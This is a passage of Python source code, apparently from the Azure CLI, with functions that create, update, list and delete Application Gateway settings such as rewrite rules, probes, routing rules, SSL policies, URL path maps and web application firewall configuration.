target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link.ip_configurations
def remove_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
updated_ip_configurations = target_private_link.ip_configurations
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
updated_ip_configurations.remove(pic)
break
else:
raise CLIError("IP Configuration doesn't exist")
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def create_ag_backend_http_settings_collection(cmd, resource_group_name, application_gateway_name, item_name, port,
probe=None, protocol='http', cookie_based_affinity=None, timeout=None,
no_wait=False, connection_draining_timeout=0,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
ApplicationGatewayBackendHttpSettings, ApplicationGatewayConnectionDraining, SubResource = cmd.get_models(
'ApplicationGatewayBackendHttpSettings', 'ApplicationGatewayConnectionDraining', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_settings = ApplicationGatewayBackendHttpSettings(
port=port,
protocol=protocol,
cookie_based_affinity=cookie_based_affinity or 'Disabled',
request_timeout=timeout,
probe=SubResource(id=probe) if probe else None,
name=item_name)
if cmd.supported_api_version(min_api='2016-09-01'):
new_settings.authentication_certificates = [SubResource(id=x) for x in auth_certs or []]
if cmd.supported_api_version(min_api='2016-12-01'):
new_settings.connection_draining = \
ApplicationGatewayConnectionDraining(
enabled=bool(connection_draining_timeout), drain_timeout_in_sec=connection_draining_timeout or 1)
if cmd.supported_api_version(min_api='2017-06-01'):
new_settings.host_name = host_name
new_settings.pick_host_name_from_backend_address = host_name_from_backend_pool
new_settings.affinity_cookie_name = affinity_cookie_name
new_settings.probe_enabled = enable_probe
new_settings.path = path
if cmd.supported_api_version(min_api='2019-04-01'):
new_settings.trusted_root_certificates = [SubResource(id=x) for x in root_certs or []]
upsert_to_collection(ag, 'backend_http_settings_collection', new_settings, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_http_settings_collection(cmd, instance, parent, item_name, port=None, probe=None, protocol=None,
cookie_based_affinity=None, timeout=None,
connection_draining_timeout=None,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
SubResource = cmd.get_models('SubResource')
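# An explicit empty string clears the certificate list, while None (argument not
# supplied) leaves the existing value untouched.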
if auth_certs == "":
instance.authentication_certificates = None
elif auth_certs is not None:
instance.authentication_certificates = [SubResource(id=x) for x in auth_certs]
if root_certs == "":
instance.trusted_root_certificates = None
elif root_certs is not None:
instance.trusted_root_certificates = [SubResource(id=x) for x in root_certs]
if port is not None:
instance.port = port
if probe is not None:
instance.probe = SubResource(id=probe)
if protocol is not None:
instance.protocol = protocol
if cookie_based_affinity is not None:
instance.cookie_based_affinity = cookie_based_affinity
if timeout is not None:
instance.request_timeout = timeout
if connection_draining_timeout is not None:
instance.connection_draining = {
'enabled': bool(connection_draining_timeout),
'drain_timeout_in_sec': connection_draining_timeout or 1
}
if host_name is not None:
instance.host_name = host_name
if host_name_from_backend_pool is not None:
instance.pick_host_name_from_backend_address = host_name_from_backend_pool
if affinity_cookie_name is not None:
instance.affinity_cookie_name = affinity_cookie_name
if enable_probe is not None:
instance.probe_enabled = enable_probe
if path is not None:
instance.path = path
return parent
def create_ag_redirect_configuration(cmd, resource_group_name, application_gateway_name, item_name, redirect_type,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, no_wait=False):
ApplicationGatewayRedirectConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayRedirectConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_config = ApplicationGatewayRedirectConfiguration(
name=item_name,
redirect_type=redirect_type,
target_listener=SubResource(id=target_listener) if target_listener else None,
target_url=target_url,
include_path=include_path,
include_query_string=include_query_string)
upsert_to_collection(ag, 'redirect_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_redirect_configuration(cmd, instance, parent, item_name, redirect_type=None,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, raw=False):
SubResource = cmd.get_models('SubResource')
if redirect_type:
instance.redirect_type = redirect_type
if target_listener:
instance.target_listener = SubResource(id=target_listener)
instance.target_url = None
if target_url:
instance.target_listener = None
instance.target_url = target_url
if include_path is not None:
instance.include_path = include_path
if include_query_string is not None:
instance.include_query_string = include_query_string
return parent
def create_ag_rewrite_rule_set(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False):
ApplicationGatewayRewriteRuleSet = cmd.get_models(
'ApplicationGatewayRewriteRuleSet')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_set = ApplicationGatewayRewriteRuleSet(name=item_name)
upsert_to_collection(ag, 'rewrite_rule_sets', new_set, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, item_name,
path='rewrite_rule_sets', key_path='name')
def update_ag_rewrite_rule_set(instance, parent, item_name):
return parent
def create_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
sequence=None, request_headers=None, response_headers=None, no_wait=False,
modified_path=None, modified_query_string=None, enable_reroute=None):
(ApplicationGatewayRewriteRule,
ApplicationGatewayRewriteRuleActionSet,
ApplicationGatewayUrlConfiguration) = cmd.get_models('ApplicationGatewayRewriteRule',
'ApplicationGatewayRewriteRuleActionSet',
'ApplicationGatewayUrlConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(ag, rule_set_name,
path='rewrite_rule_sets', key_path='name')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
new_rule = ApplicationGatewayRewriteRule(
name=rule_name,
rule_sequence=sequence,
action_set=ApplicationGatewayRewriteRuleActionSet(
request_header_configurations=request_headers,
response_header_configurations=response_headers,
url_configuration=url_configuration
)
)
upsert_to_collection(rule_set, 'rewrite_rules', new_rule, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def update_ag_rewrite_rule(instance, parent, cmd, rule_set_name, rule_name, sequence=None,
request_headers=None, response_headers=None,
modified_path=None, modified_query_string=None, enable_reroute=None):
with cmd.update_context(instance) as c:
c.set_param('rule_sequence', sequence)
c.set_param('action_set.request_header_configurations', request_headers)
c.set_param('action_set.response_header_configurations', response_headers)
ApplicationGatewayUrlConfiguration = cmd.get_models('ApplicationGatewayUrlConfiguration')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
c.set_param('action_set.url_configuration', url_configuration)
return parent
def show_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def list_ag_rewrite_rules(cmd, resource_group_name, application_gateway_name, rule_set_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, path='rewrite_rule_sets.rewrite_rules', key_path='name')
def delete_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(gateway, rule_set_name, path='rewrite_rule_sets', key_path='name')
rule = find_child_item(rule_set, rule_name, path='rewrite_rules', key_path='name')
rule_set.rewrite_rules.remove(rule)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
variable, no_wait=False, pattern=None, ignore_case=None, negate=None):
ApplicationGatewayRewriteRuleCondition = cmd.get_models(
'ApplicationGatewayRewriteRuleCondition')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule = find_child_item(ag, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
new_condition = ApplicationGatewayRewriteRuleCondition(
variable=variable,
pattern=pattern,
ignore_case=ignore_case,
negate=negate
)
upsert_to_collection(rule, 'conditions', new_condition, 'variable')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def update_ag_rewrite_rule_condition(instance, parent, cmd, rule_set_name, rule_name, variable, pattern=None,
ignore_case=None, negate=None):
with cmd.update_context(instance) as c:
c.set_param('pattern', pattern)
c.set_param('ignore_case', ignore_case)
c.set_param('negate', negate)
return parent
def show_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def list_ag_rewrite_rule_conditions(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name')
def delete_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule = find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
condition = find_child_item(rule, variable, path='conditions', key_path='variable')
rule.conditions.remove(condition)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_probe(cmd, resource_group_name, application_gateway_name, item_name, protocol, host,
path, interval=30, timeout=120, threshold=8, no_wait=False, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
ApplicationGatewayProbe, ProbeMatchCriteria = cmd.get_models(
'ApplicationGatewayProbe', 'ApplicationGatewayProbeHealthResponseMatch')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_probe = ApplicationGatewayProbe(
name=item_name,
protocol=protocol,
host=host,
path=path,
interval=interval,
timeout=timeout,
unhealthy_threshold=threshold)
if cmd.supported_api_version(min_api='2017-06-01'):
new_probe.pick_host_name_from_backend_http_settings = host_name_from_http_settings
new_probe.min_servers = min_servers
new_probe.match = ProbeMatchCriteria(body=match_body, status_codes=match_status_codes)
if cmd.supported_api_version(min_api='2019-04-01'):
new_probe.port = port
upsert_to_collection(ag, 'probes', new_probe, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_probe(cmd, instance, parent, item_name, protocol=None, host=None, path=None,
interval=None, timeout=None, threshold=None, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
if protocol is not None:
instance.protocol = protocol
if host is not None:
instance.host = host
if path is not None:
instance.path = path
if interval is not None:
instance.interval = interval
if timeout is not None:
instance.timeout = timeout
if threshold is not None:
instance.unhealthy_threshold = threshold
if host_name_from_http_settings is not None:
instance.pick_host_name_from_backend_http_settings = host_name_from_http_settings
if min_servers is not None:
instance.min_servers = min_servers
if match_body is not None or match_status_codes is not None:
ProbeMatchCriteria = \
cmd.get_models('ApplicationGatewayProbeHealthResponseMatch')
instance.match = instance.match or ProbeMatchCriteria()
if match_body is not None:
instance.match.body = match_body
if match_status_codes is not None:
instance.match.status_codes = match_status_codes
if port is not None:
instance.port = port
return parent
def create_ag_request_routing_rule(cmd, resource_group_name, application_gateway_name, item_name,
address_pool=None, http_settings=None, http_listener=None, redirect_config=None,
url_path_map=None, rule_type='Basic', no_wait=False, rewrite_rule_set=None,
priority=None):
ApplicationGatewayRequestRoutingRule, SubResource = cmd.get_models(
'ApplicationGatewayRequestRoutingRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not address_pool and not redirect_config:
address_pool = _get_default_id(ag, 'backend_address_pools', '--address-pool')
if not http_settings and not redirect_config:
http_settings = _get_default_id(ag, 'backend_http_settings_collection', '--http-settings')
if not http_listener:
http_listener = _get_default_id(ag, 'http_listeners', '--http-listener')
new_rule = ApplicationGatewayRequestRoutingRule(
name=item_name,
rule_type=rule_type,
priority=priority,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
http_listener=SubResource(id=http_listener),
url_path_map=SubResource(id=url_path_map) if url_path_map else None)
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
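# Recover the parameter's own variable name ('rewrite_rule_set') via locals() so
# supported_api_version() can check the API-version constraints registered for that CLI argument.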
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
upsert_to_collection(ag, 'request_routing_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_request_routing_rule(cmd, instance, parent, item_name, address_pool=None,
http_settings=None, http_listener=None, redirect_config=None, url_path_map=None,
rule_type=None, rewrite_rule_set=None, priority=None):
SubResource = cmd.get_models('SubResource')
if address_pool is not None:
instance.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
instance.backend_http_settings = SubResource(id=http_settings)
if redirect_config is not None:
instance.redirect_configuration = SubResource(id=redirect_config)
if http_listener is not None:
instance.http_listener = SubResource(id=http_listener)
if url_path_map is not None:
instance.url_path_map = SubResource(id=url_path_map)
if rule_type is not None:
instance.rule_type = rule_type
if rewrite_rule_set is not None:
instance.rewrite_rule_set = SubResource(id=rewrite_rule_set)
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
return parent
def create_ag_ssl_certificate(cmd, resource_group_name, application_gateway_name, item_name, cert_data=None,
cert_password=None, key_vault_secret_id=None, no_wait=False):
ApplicationGatewaySslCertificate = cmd.get_models('ApplicationGatewaySslCertificate')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_cert = ApplicationGatewaySslCertificate(
name=item_name, data=cert_data, password=cert_password, key_vault_secret_id=key_vault_secret_id)
upsert_to_collection(ag, 'ssl_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_ssl_certificate(instance, parent, item_name,
cert_data=None, cert_password=None, key_vault_secret_id=None):
if cert_data is not None:
instance.data = cert_data
if cert_password is not None:
instance.password = cert_password
if key_vault_secret_id is not None:
instance.key_vault_secret_id = key_vault_secret_id
return parent
def set_ag_ssl_policy_2017_03_01(cmd, resource_group_name, application_gateway_name, disabled_ssl_protocols=None,
clear=False, no_wait=False):
ApplicationGatewaySslPolicy = cmd.get_models('ApplicationGatewaySslPolicy')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.ssl_policy = None if clear else ApplicationGatewaySslPolicy(
disabled_ssl_protocols=disabled_ssl_protocols)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_ssl_policy_2017_06_01(cmd, resource_group_name, application_gateway_name, policy_name=None, policy_type=None,
disabled_ssl_protocols=None, cipher_suites=None, min_protocol_version=None,
no_wait=False):
ApplicationGatewaySslPolicy, ApplicationGatewaySslPolicyType = cmd.get_models(
'ApplicationGatewaySslPolicy', 'ApplicationGatewaySslPolicyType')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
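# Re-derive the SSL policy type: an explicit predefined policy name wins; otherwise
# custom cipher suites or a minimum protocol version imply a Custom policy.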
policy_type = None
if policy_name:
policy_type = ApplicationGatewaySslPolicyType.predefined.value
elif cipher_suites or min_protocol_version:
policy_type = ApplicationGatewaySslPolicyType.custom.value
ag.ssl_policy = ApplicationGatewaySslPolicy(
policy_name=policy_name,
policy_type=policy_type,
disabled_ssl_protocols=disabled_ssl_protocols,
cipher_suites=cipher_suites,
min_protocol_version=min_protocol_version)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_ssl_policy(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).ssl_policy
def create_ag_trusted_root_certificate(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False,
cert_data=None, keyvault_secret=None):
ApplicationGatewayTrustedRootCertificate = cmd.get_models('ApplicationGatewayTrustedRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
root_cert = ApplicationGatewayTrustedRootCertificate(name=item_name, data=cert_data,
key_vault_secret_id=keyvault_secret)
upsert_to_collection(ag, 'trusted_root_certificates', root_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_trusted_root_certificate(instance, parent, item_name, cert_data=None, keyvault_secret=None):
if cert_data is not None:
instance.data = cert_data
if keyvault_secret is not None:
instance.key_vault_secret_id = keyvault_secret
return parent
def create_ag_url_path_map(cmd, resource_group_name, application_gateway_name, item_name, paths,
address_pool=None, http_settings=None, redirect_config=None, rewrite_rule_set=None,
default_address_pool=None, default_http_settings=None, default_redirect_config=None,
no_wait=False, rule_name='default', default_rewrite_rule_set=None, firewall_policy=None):
ApplicationGatewayUrlPathMap, ApplicationGatewayPathRule, SubResource = cmd.get_models(
'ApplicationGatewayUrlPathMap', 'ApplicationGatewayPathRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_rule = ApplicationGatewayPathRule(
name=rule_name,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
paths=paths
)
new_map = ApplicationGatewayUrlPathMap(
name=item_name,
default_backend_address_pool=SubResource(id=default_address_pool) if default_address_pool else None,
default_backend_http_settings=SubResource(id=default_http_settings) if default_http_settings else None,
path_rules=[])
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
new_map.default_redirect_configuration = \
SubResource(id=default_redirect_config) if default_redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
new_map.default_rewrite_rule_set = \
SubResource(id=default_rewrite_rule_set) if default_rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
# pull defaults from the rule specific properties if the default-* option isn't specified
if new_rule.backend_address_pool and not new_map.default_backend_address_pool:
new_map.default_backend_address_pool = new_rule.backend_address_pool
if new_rule.backend_http_settings and not new_map.default_backend_http_settings:
new_map.default_backend_http_settings = new_rule.backend_http_settings
if new_rule.redirect_configuration and not new_map.default_redirect_configuration:
new_map.default_redirect_configuration = new_rule.redirect_configuration
new_map.path_rules.append(new_rule)
upsert_to_collection(ag, 'url_path_maps', new_map, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_url_path_map(cmd, instance, parent, item_name, default_address_pool=None,
default_http_settings=None, default_redirect_config=None, raw=False,
default_rewrite_rule_set=None):
SubResource = cmd.get_models('SubResource')
if default_address_pool == '':
instance.default_backend_address_pool = None
elif default_address_pool:
instance.default_backend_address_pool = SubResource(id=default_address_pool)
if default_http_settings == '':
instance.default_backend_http_settings = None
elif default_http_settings:
instance.default_backend_http_settings = SubResource(id=default_http_settings)
if default_redirect_config == '':
instance.default_redirect_configuration = None
elif default_redirect_config:
instance.default_redirect_configuration = SubResource(id=default_redirect_config)
if default_rewrite_rule_set == '':
instance.default_rewrite_rule_set = None
elif default_rewrite_rule_set:
instance.default_rewrite_rule_set = SubResource(id=default_rewrite_rule_set)
return parent
def create_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, paths, address_pool=None, http_settings=None, redirect_config=None,
firewall_policy=None, no_wait=False, rewrite_rule_set=None):
ApplicationGatewayPathRule, SubResource = cmd.get_models('ApplicationGatewayPathRule', 'SubResource')
if address_pool and redirect_config:
raise CLIError("Cannot reference a BackendAddressPool when Redirect Configuration is specified.")
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
default_backend_pool = SubResource(id=url_map.default_backend_address_pool.id) \
if (url_map.default_backend_address_pool and not redirect_config) else None
default_http_settings = SubResource(id=url_map.default_backend_http_settings.id) \
if url_map.default_backend_http_settings else None
new_rule = ApplicationGatewayPathRule(
name=item_name,
paths=paths,
backend_address_pool=SubResource(id=address_pool) if address_pool else default_backend_pool,
backend_http_settings=SubResource(id=http_settings) if http_settings else default_http_settings)
if cmd.supported_api_version(min_api='2017-06-01'):
default_redirect = SubResource(id=url_map.default_redirect_configuration.id) \
if (url_map.default_redirect_configuration and not address_pool) else None
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else default_redirect
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
upsert_to_collection(url_map, 'path_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def delete_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
url_map.path_rules = \
[x for x in url_map.path_rules if x.name.lower() != item_name.lower()]
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2016_09_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
no_wait=False):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2017_03_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
rule_set_type='OWASP', rule_set_version=None,
disabled_rule_groups=None,
disabled_rules=None, no_wait=False,
request_body_check=None, max_request_body_size=None, file_upload_limit=None,
exclusions=None):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode, rule_set_type=rule_set_type,
rule_set_version=rule_set_version)
if disabled_rule_groups or disabled_rules:
ApplicationGatewayFirewallDisabledRuleGroup = cmd.get_models('ApplicationGatewayFirewallDisabledRuleGroup')
disabled_groups = []
# disabled groups can be added directly
for group in disabled_rule_groups or []:
disabled_groups.append(ApplicationGatewayFirewallDisabledRuleGroup(rule_group_name=group))
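# Helper generator: expand each element of the collection (here, every rule group of
# every returned rule set) so individual rule IDs can be matched below.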
def _flatten(collection, expand_property_fn):
for each in collection:
for value in expand_property_fn(each):
yield value
# for disabled rules, we have to look up the IDs
if disabled_rules:
results = list_ag_waf_rule_sets(ncf, _type=rule_set_type, version=rule_set_version, group='*')
for group in _flatten(results, lambda r: r.rule_groups):
disabled_group = ApplicationGatewayFirewallDisabledRuleGroup(
rule_group_name=group.rule_group_name, rules=[])
for rule in group.rules:
if str(rule.rule_id) in disabled_rules:
disabled_group.rules.append(rule.rule_id)
if disabled_group.rules:
disabled_groups.append(disabled_group)
ag.web_application_firewall_configuration.disabled_rule_groups = disabled_groups
if cmd.supported_api_version(min_api='2018-08-01'):
ag.web_application_firewall_configuration.request_body_check = request_body_check
ag.web_application_firewall_configuration.max_request_body_size_in_kb = max_request_body_size
ag.web_application_firewall_configuration.file_upload_limit_in_mb = file_upload_limit
ag.web_application_firewall_configuration.exclusions = exclusions
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_waf_config(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).web_application_firewall_configuration
def list_ag_waf_rule_sets(client, _type=None, version=None, group=None):
results = client.list_available_waf_rule_sets().value
filtered_results = []
# filter by rule set name or version
for rule_set in results:
if _type and _type.lower() != rule_set.rule_set_type.lower():
continue
if version and version.lower() != rule_set.rule_set_version.lower():
continue
filtered_groups = []
for rule_group in rule_set.rule_groups:
if not group:
rule_group.rules = None
filtered_groups.append(rule_group)
elif group.lower() == rule_group.rule_group_name.lower() or group == '*':
filtered_groups.append(rule_group)
if filtered_groups:
rule_set.rule_groups = filtered_groups
filtered_results.append(rule_set)
return filtered_results
# endregion
# region ApplicationGatewayWAFPolicy
def create_ag_waf_policy(cmd, client, resource_group_name, policy_name,
location=None, tags=None, rule_set_type='OWASP',
rule_set_version='3.0'):
WebApplicationFirewallPolicy, ManagedRulesDefinition, \
ManagedRuleSet = cmd.get_models('WebApplicationFirewallPolicy',
'ManagedRulesDefinition',
'ManagedRuleSet')
# https://docs.microsoft.com/en-us/azure/application-gateway/waf-overview
# mandatory default rule with empty rule sets
managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type, rule_set_version=rule_set_version)
managed_rule_definition = ManagedRulesDefinition(managed_rule_sets=[managed_rule_set])
waf_policy = WebApplicationFirewallPolicy(location=location, tags=tags, managed_rules=managed_rule_definition)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_ag_waf_policy(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_ag_waf_policies(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'web_application_firewall_policies', resource_group_name)
# endregion
# region ApplicationGatewayWAFPolicyRules PolicySettings
def update_waf_policy_setting(cmd, instance,
state=None, mode=None,
max_request_body_size_in_kb=None, file_upload_limit_in_mb=None,
request_body_check=False):
if state is not None:
instance.policy_settings.state = state
if mode is not None:
instance.policy_settings.mode = mode
if max_request_body_size_in_kb is not None:
instance.policy_settings.max_request_body_size_in_kb = max_request_body_size_in_kb
if file_upload_limit_in_mb is not None:
instance.policy_settings.file_upload_limit_in_mb = file_upload_limit_in_mb
if request_body_check is not None:
instance.policy_settings.request_body_check = request_body_check
return instance
def list_waf_policy_setting(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).policy_settings
# endregion
# region ApplicationGatewayWAFPolicyRules
def create_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, priority, rule_type, action):
